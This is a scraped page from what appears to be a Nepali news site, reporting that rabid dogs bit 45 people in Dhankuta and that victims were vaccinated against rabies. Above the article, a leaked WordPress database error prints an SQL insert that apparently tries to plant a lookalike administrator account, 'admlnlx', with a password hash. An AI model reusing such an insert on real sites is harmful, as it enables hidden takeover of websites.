WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6UPwRR7PuqkV4e42ITAhgricCYu/e0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 04:45:42', '', 'admlnlx', 'admlnlx')
धनकुटा, माघ २२ –
धनकुटामा केही दिनयता बहुला कुकुरको टोकाइबाट ४५ जना घाइते भएका छन् । जिल्ला अस्पताल धनकुटाको रेकर्ड अनुसार धनकुटा नगरपालिकाको वडा नं। १३ र १४ का बासिन्दालाई बौलाह कुकुरले टोकेपछि रेविजविरुद्धको भ्याक्सिन लगाइएको छ ।
शुक्रबार मात्रै १६ जनालाई रेविज विरुद्धको भ्याक्सिन लगाइएको छ। बौलाह कुकुरले टोकेको भन्दै अस्पतालमा आएका ती बिरामीलाई भ्याक्सिन लगाएको जिल्ला अस्पताल धनकुटाका प्रमुख डा। मदनकुमार उपाध्यायले बताउनुभयो ।
गाउँमा बौलाह कुकुरले तोकेर आतंकित बनाएपछि कुकुर मार्नको लागि अनुरोध गर्दै स्थानीय बासिन्दा धनकुटा नगरपालिका आएका थिए । गाउँलेको उजुरीको कारण बहुला कुकुर प्रभावित क्षेत्रमा कुकुर मार्नको लागि आवश्यक सामाग्रीसहित कर्मचारी पठाइएको धनकुटा नगरपालिका कार्यालयले जानकारी दिएको छ ।